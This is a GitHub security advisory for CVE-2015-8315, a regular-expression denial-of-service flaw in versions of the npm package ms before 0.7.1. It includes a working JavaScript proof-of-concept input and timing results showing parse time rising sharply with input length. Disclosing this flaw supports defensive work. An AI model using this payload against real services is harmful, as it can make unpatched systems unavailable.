Navigation Menu

Skip to content

Regular Expression Denial of Service in ms

High severity GitHub Reviewed Published Oct 24, 2017 to the GitHub Advisory Database • Updated Nov 5, 2023

Package

npm ms (npm)

Affected versions

< 0.7.1

Patched versions

0.7.1

Description

Versions of ms prior to 0.7.1 are affected by a regular expression denial of service vulnerability when extremely long version strings are parsed.

Proof of Concept

var ms = require('ms');
var genstr = function (len, chr) {
   var result = "";
   for (i=0; i<=len; i++) {
       result = result + chr;
   }

   return result;
}

ms(genstr(process.argv[2], "5") + " minutea");

Results

Showing increase in execution time based on the input string.

$ time node ms.js 10000

real	0m0.758s
user	0m0.724s
sys	0m0.031s

$ time node ms.js 20000

real	0m2.580s
user	0m2.494s
sys	0m0.047s

$ time node ms.js 30000

real	0m5.747s
user	0m5.483s
sys	0m0.080s

$ time node ms.js 80000

real	0m41.022s
user	0m38.894s
sys	0m0.529s

References

Published by the National Vulnerability Database Jan 23, 2017
Published to the GitHub Advisory Database Oct 24, 2017
Reviewed Jun 16, 2020
Last updated Nov 5, 2023

Severity

High
7.5
/ 10

CVSS base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Weaknesses

CVE ID

CVE-2015-8315

GHSA ID

GHSA-3fx5-fwvr-xrjg

Source code

Checking history
See something to contribute? Suggest improvements for this vulnerability.